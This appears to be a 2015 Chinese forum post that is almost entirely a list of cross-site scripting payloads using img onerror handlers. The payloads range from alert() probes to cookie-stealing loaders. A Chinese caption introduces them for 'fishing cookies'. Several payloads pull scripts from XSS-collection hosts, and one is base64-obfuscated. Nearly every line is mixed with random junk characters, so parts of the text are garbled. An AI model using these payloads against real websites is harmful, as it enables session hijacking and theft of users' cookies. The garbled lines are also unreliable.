<img src='non-exist.jpg'onerror="alert('xss')">2 t) e7 s/ y+ Z* b' ?0 a( x
<img src=# onerror=alert(123)> f* ?6 w) \: x& m& C
<img src=# onerror=alert(document.cookie)>! [" F, T6 }3 b% t$ e
下面是利用平台钓cookie的; K5 H3 U1 S4 u& f! M Y. k3 m
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>; O7 b! \) H' B( Q# q' I
" R4 H; j; j6 o. f, t" E) z+ r+ n6 E& E) B, K% Z: B* K' ]; y) c
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
* z# `1 u; X2 g t9 G<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img> K8 J% @( |* ]: Q; h, Y9 s
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
) Q# H) y! u$ ^3 ~) _/ o$ m! p<img src=1 onerror=jQuery.getScript("//xss.re/974")>
1 T4 B8 ?7 ^% I* B4 e' X<img src="#">
# C+ f" ~+ ]7 J1 B- u& R<img src="#">8 K# @/ b) @# p
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>6 A- ]. o6 I5 R0 `0 e+ a
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">1 }1 D2 E% M$ s4 O6 {9 E$ D7 \
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>1 P w; ^# u* R0 l% N
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
5 S) q# M) n/ ?1 w<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
7 J/ L! I' Z- ?: {<img src=x width="0" height="0"></img>
( p& _; m% ^! N* h<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
~3 D4 f2 q- q6 F<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>. S2 r9 z' E9 Z' f: F+ A0 A
|
发表于 2015-10-18 14:33:54
收藏
支持
反对